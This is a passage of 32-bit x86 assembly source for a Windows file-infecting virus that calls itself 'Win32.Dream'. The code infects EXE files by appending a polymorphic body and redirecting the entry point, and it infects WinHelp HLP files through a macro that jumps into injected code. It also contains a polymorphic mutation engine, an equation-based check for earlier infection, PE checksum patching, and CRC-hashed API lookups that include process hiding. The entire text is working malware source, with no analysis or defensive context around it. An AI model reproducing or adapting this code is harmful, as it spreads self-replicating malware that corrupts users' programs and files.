cmp byte ptr [edi],0
jnz ncfw
ncf_failed:
popa
ret
newCreateFile endp
start_thread macro thread
pusha ;threads gdelta
push 80h ;Sleep function
call $+5
pop ebp
sub ebp,$-thread-1
mov esi,[esp+40]
IFE st_count NE 0
if_shared_mem equ $-4
push 80h 0 1F0FFFh
if_parent equ $-11
call [esi+apiz+12*4] ;OpenProcess
xchg eax,esi
xchg eax,ebx
or esi,esi
jnz $ + 11 ;terminate all processes
inc esi
mov [ebx+paramz+(6-1)*4],esi
jmp ifex
push esi
call [ebx+apiz+1*4] ;CloseHandle
mov esi,ebx
ELSE
push 1
pop edi
cmp [esi+paramz+(6-1)*4],edi ;terminate this process?
jnz $ + 4
jmp edi
ENDIF
mov eax,[esi+paramz+(7-1)*4]
test al,1
jz $ + 4
mov al,[eax]
lea edi,[esi+active+st_count]
push edi
cmp byte ptr [edi],0
jz @@end
endm
st_count = 0
end_thread macro thread
st_count = st_count + 1
mov edi,[esp]
mov byte ptr [edi],0
@@end:pop edi eax ;sleep function
call eax, 2
popa ;don't terminate
jmp thread
endm
dw check_infected-infect_file
infect_file proc
start_thread infect_file
lea esi,[ebx+vbody+vsize]
ifex:lodsb
cmp al,'.'
jnz ifex
dec esi
lodsd
or eax,20202020h
mov ebx,[esp+44]
lea edi,[ebx+active+4]
lea esi,[ebx+process+8*4] ;infect_exe hProcess, ProcID
cmp eax,'exe.'
jz if_2
cmp eax,'plh.'
jnz if_failed
if_call_hlp:
sub esi,8 ;infect_hlp
dec edi
if_2:lodsd
push eax
lodsd
mov byte ptr [edi],1 ;active infect_exe (_hlp)
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
xchg eax,ecx
jecxz if_failed - 1
if_r:pop eax
push eax 40 eax
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz if_r
pop eax
if_failed:
end_thread infect_file
infect_file endp
dw create_infected-check_infected
check_infected proc
start_thread check_infected
xchg ebx,esi
xor esi,esi
cmp [ebx+paramz+(5-1)*4],1
jz ci_nomem
other_process_mem macro shared_mem, param ;get mem from other process
call $ + 7
db "1",0
push 1 4
call [shared_mem+apiz+24*4] ;OpenFileMappingA
xor ecx,ecx
push eax ecx ecx ecx 4 eax
call [shared_mem+apiz+7*4] ;MapViewOfFile
push eax
xchg eax,esi
endm
other_process_mem ebx, 4
ci_nomem:
add esi,[ebx+paramz+(4-1)*4]
mov ecx,[esi-4-tbyte] ;number of the terms in a
or ecx,ecx ;equation
jz ci_failed
cmp ecx,8
jnbe ci_failed
sub esp,128
fsave [esp]
push ecx
imul ecx,-(tbyte+tbyte)
sub ecx,tbyte+tbyte+4+tbyte
lea esi,[esi+ecx] ;data starts here
lea edi,[ebx+vbody+vsize+260]
cmp [ebx+paramz+(5-1)*4],1
jnz $ + 8
lea edi,[ebx+vbody+vsize+260+ci_size/2]
neg ecx
push edi
rep movsb
pop esi ecx
push ecx esi
fld tbyte ptr [esi+tbyte] ;derivation of the equations
fld st(0) ;you'll get two tangents
fld tbyte ptr [esi]
fmul
fld1
fsubp st(2),st
fstp tbyte ptr [esi]
fstp tbyte ptr [esi+tbyte]
sub esi,-(tbyte+tbyte)
loop $ - 21
pop esi ecx
sub esp,tbyte+tbyte
fldz
fldz
fstp tbyte ptr [esp]
fstp tbyte ptr [esp+tbyte]
push esi ecx
imul eax,[esp],tbyte+tbyte ;involution of the equations
fld tbyte ptr [esi]
fld tbyte ptr [esi+tbyte]
fld tbyte ptr [esi+eax+tbyte]
fld tbyte ptr [esi+eax]
fld st(2)
fld st(4)
fxch st(2)
lea edx,[ebp+($+32)-check_infected]
push edx
fyl2x ;over natural logarithm
fld st(0)
frndint
fsubr st(1),st
fxch
fchs
f2xm1
fld1
faddp
fscale
fstp st(1)
fmul
ret
fld tbyte ptr [esp+tbyte+2*dword]
faddp
fstp tbyte ptr [esp+tbyte+2*dword]
call $ - 35 ;we've two points on the curve
fld tbyte ptr [esp+2*dword]
faddp
fstp tbyte ptr [esp+2*dword]
sub esi,-(tbyte+tbyte)
dec dword ptr [esp] ;next term in the equation
jnz $ - 85
pop ecx ecx
fld tbyte ptr [esp+tbyte] ;calculate an angle of the
fld tbyte ptr [esp] ;two tangents of the equation
fld st(1)
fld st(1)
fsub
fxch st(2)
fmul
fld1
fadd
fdiv
fabs
fld1
fpatan
push 180 ;radian -> angle
fimul dword ptr [esp]
fldpi
fdiv
pop eax
sub esp,-(tbyte+tbyte)
mov eax,2*tbyte+dword
cmp dword ptr [ebx+paramz+(5-1)*4],1
jnz $ + 12
sub eax,-(dword-ci_size/2)
fld st(0)
fstp tbyte ptr [esi+eax]
fld tbyte ptr [esi+eax]
fsub
sub esp,tbyte
fstp tbyte ptr [esp]
cmp dword ptr [esp+tbyte-dword],0 ;compare the results
lahf
sub esp,-tbyte
wait
fnrstor [esp]
sub esp,-128
sahf
jnz ci_failed
push 1
pop eax
mov [ebx+paramz+(4-1)*4],eax
jmp ci_finish
ci_failed:
xor eax,eax
mov [ebx+paramz+(4-1)*4],eax
ci_finish:
cmp [ebx+paramz+(5-1)*4],1
jz $ + 8
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread check_infected
check_infected endp
dw infect_hlp-create_infected
create_infected proc
start_thread create_infected
lea edi,[esi+vbody+vsize+260]
push edi
stosd
call $ + 241 ;number of the terms in a
shr eax,29 ;equation
xchg eax,ecx
inc ecx
push ecx
sub esp,128
fnsave [esp]
call $ + 221 ;generate a multiplier (+/-)
sub edx,edx
mov ebx,100000
div ebx
or edx,edx
jz $ - 16
fld1
rcr eax,1
jc $ + 4
fchs
push edx
fimul dword ptr [esp]
fstp tbyte ptr [edi]
pop edx
sub edi,-tbyte
call $ + 119 ;generate an exponent
loop $ - 41 ;next term in the equation
inc ecx
inc ecx
call $ + 110 ;two points on the curve
loop $ - 5
fnrstor [esp]
sub esp,-128
pop eax
stosd
lea ecx,[edi+tbyte]
sub edi,[esp]
xchg eax,edi
pop edi
stosd
pusha ;calculate an angle, it
mov ebx,esi ;means: call other process
mov [esi+paramz+(4-1)*4],ecx
mov [esi+paramz+(5-1)*4],1
lea edi,[esi+active+1]
lea esi,[esi+process+1*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
mov [esi+paramz+(5-1)*4],0
end_thread create_infected
call $ + 66 ;generate an exponent
sub edx,edx
push 11
pop ebx
div ebx
or edx,edx
jz $-14
push edx
fild dword ptr [esp]
call $+15
dt 3FEB8637BD05AF6C69B6r
pop eax ebx
fld tbyte ptr [eax]
xchg ebx,eax
cdq
call $ + 25
mov ebx,1000000
div ebx
push edx
fimul dword ptr [esp]
fsub
fstp tbyte ptr [edi]
pop eax
sub edi,-tbyte
ret
mov eax,0 ;get a random value
lpGetTickCount equ $-4
call eax
add eax,80h
push ecx 33
pop ecx
add eax,eax
jnc $ + 4
xor al,197
loop $ - 6
mov [ebp+($-16)-create_infected],eax
pop ecx
ret
create_infected endp
dw infect_exe-infect_hlp
infect_hlp proc
start_thread infect_hlp
sub esp,16
sub ebx,ebx
mov word ptr [esi+vbody+__return+11-vstart],02EBh
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;open file
inc eax
jz ih_failed
dec eax
push eax
mov bh,80h
push ebx 40h
mov eax,0
lpGlobalAlloc equ $-4
call eax ;GlobalAlloc
mov [esp+4],eax
xchg eax,esi
push 16
pop ecx
sub edx,edx
call read
jc ih_free
lodsd
cmp eax,35f3fh ;hlp signature
jnz ih_free
lodsd
lea edx,[eax+55] ;directory offset
mov ecx,512
lodsd
lodsd
call read
ih_search:
dec ecx
jz ih_free
cmp dword ptr [esi+ecx],'SYS|'
jnz ih_search
cmp dword ptr [esi+ecx+4],'MET'
jnz ih_search
mov eax,[esi-4]
xchg eax,[esi+ecx+8]
xchg eax,edx
push 21
sub esi,-512
pop ecx
call read
lodsd
push 21
pop ecx
sub eax,ecx
add edx,ecx
mov [esp+4+4],edx
mov [esp+8+4],eax
mov edi,[esp+4]
sub edi,-549
lea esi,[ebp+hlp1_s-infect_hlp]
lea eax,[edi+size-hlp1_s]
mov [esp+12+4],eax
push hlp1_e-hlp1_s
pop ecx
rep movsb
push edi
mov ebx,[esp+40+16+8+4]
lea esi,[ebx+vbody]
push esi
sub esi,-vsize
ih_next:
sub esi,4
mov eax,[esi]
call ihck
or edx,edx
jnz ihex
mov al,68h
stosb
mov eax,[esi]
stosd
jmp ihdn
ihex:mov al,0b8h
stosb
mov eax,[esi]
xor eax,edx
stosd
mov al,53
stosb
mov eax,edx
stosd
mov al,80
stosb
ihdn:cmp [esp],esi
jnz ih_next
jmp ihcn
ihck:call ihcv
jc iha1
sub edx,edx
ret
iha1:mov ebx,eax
ihax:mov eax,ebx
call $+9
dd 12345678h
pop edx
sub [edx],12345678h
org $-4
rnd dd 87654321h
mov edx,[edx]
xor [ebp+rnd-infect_hlp],edx
xor eax,edx
call ihcv
jc ihax
xchg eax,edx
call ihcv
jc ihax
xchg edx,eax
ret
ihcv:pusha
push 4
pop ecx
icva:cmp al,' '
jna icvf
cmp al,0f0h
jnbe icvf
cmp al,'"'
jz icvf
cmp al,"'"
jz icvf
cmp al,"`"
jz icvf
cmp al,"\"
jz icvf
ror eax,8
loop icva
test al,0F9h
icvf equ $-1
popa
ret
ihcn:pop eax eax
mov ecx,edi
sub ecx,eax
sub eax,eax
mov [esi+org_ep-vstart],eax
push ecx
sub ecx, p1-hlp1_e+hlp1_e-hlp2_e
mov eax,[esp+12+4+4]
mov [eax],cx
sub esi,vstart-hlp1_e
push hlp2_sz
pop ecx
rep movsb
pop eax
mov esi,[esp+4] ;buffer
sub esi,-528
sub eax,hlp1_s-hlp2_e-21
mov [esi],eax
add [esi+4],eax
mov esi,edi
mov edx,[esp+4+4]
mov ecx,[esp+8+4]
sub eax,ecx
jna ih_free
call read
cmp [esi+4],"`(RR" ;already infected?
jz ih_free
mov ebx,[esp+4]
lea ecx,[edi+eax]
sub ecx,ebx
sub ecx,528
mov eax,[esp+4]
sub eax,-528
mov edx,[eax]
sub edx,ecx
sub [eax],edx
mov edx,[ebx+12]
lea esi,[ebx+528]
call write
mov esi,[esp+4]
push 16
add [esi+12],ecx
sub edx,edx
pop ecx
call write
mov edx,[esi+4]
sub edx,-55
mov ecx,512
sub esi,-16
call write
jmp ih_free
spos:pusha
sub eax,eax
push eax eax edx dword ptr [esp+4*5+8*4]
mov eax,0
lpSetFilePointer equ $-4
call eax
popa
ret
read:call spos
pusha
sub eax,eax
push ecx eax
call $+9
r_ts:dd ?
push ecx esi dword ptr [esp+4*6+8*4]
mov eax,0
lpReadFile equ $-4
call eax
pop ecx
cmp dword ptr [ebp+r_ts-infect_hlp],ecx
jnz $+3
test al,0F9h
popa
ret
write:call spos
pusha
sub eax,eax
push eax
lea ebx,[ebp+r_ts-infect_hlp]
push ebx ecx esi dword ptr [esp+4*5+8*4]
mov eax,[esp+4*5+8*4+4+16+8+40] ;ou! what does it mean :) ?
call [eax+apiz+4*10]
popa
ret
hlp1_s=$
dw 4
dw offset label1-$-2
db "RR(`USER32.DLL',`EnumWindows',`SU')",0
label1=$
dw 4
size dw 0
p1 = $
db "EnumWindows(`"
hlp1_e= $
jmp esp
db "',0)",0
hlp2_e = $
hlp2_sz=hlp2_e-hlp1_e
ih_free:
mov esi,[esp+40+16+4+4]
call [esi+apiz+4*1] ;CloseHandle
mov eax,0
lpGlobalFree equ $-4
call eax
ih_failed:
sub esp,-12
end_thread infect_hlp
infect_hlp endp
dw poly_engine-infect_exe
infect_exe proc
start_thread infect_exe
sub ebx,ebx
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;CreateFileA
inc eax
jz ie_failed
dec eax
push eax ebx eax
mov eax,0
lpGetFileSize equ $-4
call eax
cmp eax,4096
jc ie_close
cmp eax,104857600
jnbe ie_close
mov [ebp+fsize-infect_exe],eax
call $ + 7
db "1",0
push ebx ebx 2 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
or eax,eax
jz ie_close
push eax ebx ebx ebx 4 eax
call [esi+apiz+28] ;MapViewOfFile
or eax,eax
jz ie_mclose
push eax
cmp word ptr [eax],'ZM'
jnz ie_unmap
cmp word ptr [eax+MZ_crlc],bx
jz ie_tested
cmp word ptr [eax+MZ_lfarlc],64
jc ie_unmap
ie_tested:
mov edi,[eax+MZ_lfanew]
add edi,eax
cmp dword ptr [edi],4550h
jnz ie_unmap
mov eax,[esp+4]
mov [esi+paramz+(3-1)*4],eax
mov eax,[ebp+fsize-infect_exe]
mov [esi+paramz+(4-1)*4],eax
call other_process, 1 ;active check_infected process
cmp [esi+paramz+(4-1)*4],1
jz ie_unmap
call other_process, 2 ;active create_infected process
mov ax,[edi+NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
jz ie_unmap
test ax,IMAGE_FILE_DLL
jnz ie_unmap
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
dec ecx
or ecx,ecx
jz ie_unmap
imul eax,ecx,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
mov [ebp+ie_section-infect_exe],eax
lea ebx,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[ebx+SH_SizeOfRawData]
push eax
add eax,[ebx+SH_VirtualAddress]
lea ecx,[esi+vbody+inf_ep-vstart]
mov [ecx],eax
mov eax,[edi+NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [ecx+5+6],eax
call other_process, 5 ;active poly_engine process
pop eax
add eax,[ebx+SH_PointerToRawData]
add eax,[esi+paramz+4*0]
add eax,dword ptr [esi+vbody+vsize+260]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebp+align_d-infect_exe],eax
call [esi+apiz+4*8] ;UnMapViewOfFile
call [esi+apiz+4*1] ;CloseHandle
sub ebx,ebx
call $ + 7
db "1",0
align_d equ $+1
push 80h ebx 4 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
push eax ebx ebx ebx 2 eax
call [esi+apiz+4*7] ;thx2 Bumblebee for his help
push eax
add eax,[eax.MZ_lfanew]
xchg eax,edi
mov ebx,0
ie_section equ $-4
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
add eax,ebx
ie_change_flag:
or [eax.SH_Characteristics],IMAGE_SCN_MEM_WRITE
sub eax,IMAGE_SIZEOF_SECTION_HEADER
loop ie_change_flag
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[esi+vbody+inf_ep-vstart]
mov [edi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax
pusha
mov ecx,[esi+paramz+4*0]
mov [esp+7*4],ecx
mov edi,[ebx+SH_SizeOfRawData]
add [esp+7*4],edi
add edi,[ebx+SH_PointerToRawData]
add edi,[esp+7*4+4]
lea esi,[esi+vbody+vsize+260+ci_size] ;poly vbody
rep movsb
popa
mov eax,[esi+paramz+4*0]
add eax,[ebx+SH_SizeOfRawData]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebx+SH_SizeOfRawData],eax
push eax
mov eax,[ebx+SH_VirtualSize]
add eax,vsize+68
mov ecx,[edi+NT_OptionalHeader.OH_SectionAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
pop ecx
cmp eax,ecx
jnc ie_1
mov eax,ecx
ie_1:mov [ebx+SH_VirtualSize],eax
add eax,[ebx+SH_VirtualAddress]
cmp eax,[edi+NT_OptionalHeader.OH_SizeOfImage]
jc ie_2
mov [edi+NT_OptionalHeader.OH_SizeOfImage],eax
ie_2:or dword ptr [ebx+SH_Characteristics], \
IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \
IMAGE_SCN_MEM_WRITE
.if dword ptr [edi+NT_OptionalHeader.OH_CheckSum] != 0
mov eax,0
fsize equ $-4
add eax,[esi+paramz+(1-1)*4]
mov [esi+paramz+(2-1)*4],eax
call other_process, 6 ;active checksum process
mov eax,[esi+paramz+(4-1)*4]
mov [edi+NT_OptionalHeader.OH_CheckSum],eax
.endif
push esi
mov edi,[ebp+align_d-infect_exe]
add edi,[esp+4]
lea esi,[esi+vbody+vsize+260]
lodsd
sub eax,4-tbyte
sub edi,eax
xchg eax,ecx
rep movsb
pop esi
ie_unmap:
call [esi+apiz+4*8] ;UnMapViewOfFile
ie_mclose:
call [esi+apiz+4*1] ;CloseHandle
ie_close:
call [esi+apiz+4*1] ;CloseHandle
ie_failed:
end_thread infect_exe
other_process proc
pusha
mov ecx,[esp+36]
mov ebx,esi
lea edi,[esi+active+ecx]
lea esi,[esi+process+ecx*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
ret 4
other_process endp
infect_exe endp
dw checksum-poly_engine
poly_engine proc
start_thread poly_engine
mov ebx,esi
lea esi,[ebx+vbody+vsize]
lea edi,[esi+260+ci_size]
push ebx edi
sub ecx,ecx
mov edx,vsize / 2
mov eax,0E8h
stosd
mov eax,242C8300h
stosd
mov al,5
stosb
@@a:call random
test al,1
jnz @@b
cmp edx,1
jz @@v
sub esi,4
push esi
lodsd
call @@1_a
pop esi
dec edx
jmp @@k
@@b:test al,2
jnz @@c
@@v:dec esi
dec esi
push esi
lodsw
inc ecx
call @@1_a
pop esi
sub cl,cl
jmp @@k
@@c:test al,4
jnz @@e
call @@1 ;push random value DWORD
jc $+7
call @@2
jmp @@l
@@e:inc ecx ;push random value WORD
call @@1
jc $+7
call @@2
sub cl,cl
jmp $+5
@@k:dec edx
jz $+4
@@l:jmp @@a
mov ax,0E4FFh
stosw
jmp pe_failed
@@1:call random ;push random value
test al,1
jnz @@1_d
@@1_a:xchg eax,ebx ;push certain value
@@1_b:jecxz @@1_c ;push WORD
mov al,66h
stosb
@@1_c:call @@3_a
test al,0F9h
@@1_d equ $-1
ret
@@2:call random ;POP reg32 or ADD ESP,4
test al,1
jnz @@2_b
and al,7
cmp al,4
jz @@2
or al,al
jz @@2
jecxz @@2_a
xchg eax,ebx
mov al,66h
stosb
xchg ebx,eax
@@2_a:add al,58h
stosb
ret
@@2_b:mov ax,0C483h
stosw
mov al,4
jecxz @@2_c
mov al,2
@@2_c:stosb
ret
@@3:xchg eax,ebx ;push certain value in EAX
@@3_a:mov al,68h ; in EBX
stosb
xchg eax,ebx
jecxz @@3_b
stosw
ret
@@3_b:stosd
ret
random:
mov eax,0BFF71234h
push ecx 33
pop ecx
@@r:add eax,eax
jnc $+4
xor al,197
loop @@r
mov [ebp+random+1-poly_engine],eax
pop ecx
ret
pe_failed:
pop ecx ebx
sub edi,ecx
mov [ebx+paramz+4*0],edi
end_thread poly_engine
poly_engine endp
dw k32_addrs-checksum
checksum proc
start_thread checksum
xchg ebx,esi
other_process_mem ebx 3 ;get mem from other process
mov ecx,[ebx+paramz+(2-1)*4]
sub edx,edx
shr ecx,1
@@1:lodsw
mov edi,0FFFFh
and eax,edi
add edx,eax
mov eax,edx
and edx,edi
shr eax,10h
add edx,eax
loop @@1
mov eax,edx
shr eax,10h
add ax,dx
add eax,[ebp+4]
mov [ebx+paramz+(4-1)*4],eax
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread checksum
checksum endp
k32_addrs equ this byte
x equ <vstart->
dw x lpCreateFile
dw x lpCloseHandle
dw x lpCreateMutexA
dw x lpGetLastError
dw x lpReleaseMutex
dw x lpExitProcess
dw x lpCreateFileMappingA
dw x lpMapViewOfFile
dw x lpUnMapViewOfFile
dw x lpGetSystemDirectory
dw x lpWriteFile
dw x lpCreateProcessA
dw x lpOpenProcess
dw x lpWaitForSingleObject
dw x lpRegisterServiceProcess
dw x lpGetFileSize
dw x lpGlobalAlloc
dw x lpGlobalFree
dw x lpReadFile
dw x lpSetFilePointer
dw x lpSetErrorMode
dw x lpGetCurrentProcessId
dw x lpGetVersion
dw x lpGetTickCount
dw x malloc+63
dw x malloc+51
dw x malloc+106
dw x infect_file-2
count equ ($-k32_addrs)/2
k32_crcs equ this byte
dd 08C892DDFh ;CreateFileA
dd 068624A9Dh ;CloseHandle
dd 020B943E7h ;CreateMutexA
dd 087D52C94h ;GetLastError
dd 0C449CF4Eh ;ReleaseMutexA
dd 040F57181h ;ExitProcess
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnMapViewOfFile
dd 0593AE7CEh ;GetSystemDirectoryA
dd 021777793h ;WriteFile
dd 0267E0B05h ;CreateProcessA
dd 033D350C4h ;OpenProcess
dd 0D4540229h ;WaitForSingleObject
dd 05F31BC8Eh ;RegisterServiceProcess
dd 0EF7D811Bh ;GetFileSize
dd 083A353C3h ;GlobalAlloc
dd 05CDF6B6Ah ;GlobalFree
dd 054D8615Ah ;ReadFile
dd 085859D42h ;SetFilePointer
dd 0A2EB817Bh ;SetErrorMode
dd 0EB1CE85Ch ;GetCurrentProcessId
dd 042F13D06h ;GetVersion
dd 0613FD7BAh ;GetTickCount
dd 041D64912h ;OpenFileMappingA
dd 0797B49ECh ;MapViewOfFile (other address)
dd 019F33607h ;CreateThread
dd 00AC136BAh ;Sleep
dd 0
process_maps equ this byte
dw x infect_file
dw x check_infected
dw x create_infected
dw x infect_hlp
dw x infect_exe
dw x poly_engine
dw x checksum
p_number equ ($-process_maps)/2
dw x malloc+95
process_memory struc
thandle dd 0 ;returned thread handle by dropper
th_mempos dd 0 ;thread body memory position
process dd p_number dup (0,0) ;hProcess (Wait), ProcessID (Open)
apiz dd count-2 dup (0) ;all API functionz without two last
active db p_number dup (0) ;active process (=function) ?
paramz dd 8 dup (0) ;process parameters
vbody db vsize dup (0) ;virus body (poly, valuez)
; filename dd 260 dup (0) ;name of file (opening, etc)
ci_size equ 2*16*(tbyte+tbyte) ;check_infected fpu buffer
; cinfected db ci_size dup(0)
; poly_vbody equ this byte
; ** This is Tasm32 bug, cannot asm through const->proc + dup
ends
align 4
file_end:
db 68 dup(0)
mem_end:
push 401000h
sub esp,vsize
jmp vstart
fgx:db "E:\X_WIN\ABCD.EXE",0
fg0:mov edx,offset fgx
sub eax,eax
push eax 80h 3 eax eax 0c0000000h edx
call CreateFileA
push 0 0
call fg1
db "Win32.Dream - welcome to my world...",0
fg1:call fg2
db "First generation sample",0
fg2:push 0
call MessageBoxA
call ExitProcess
;<3B><>Ĵ end of virus <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
end mem_end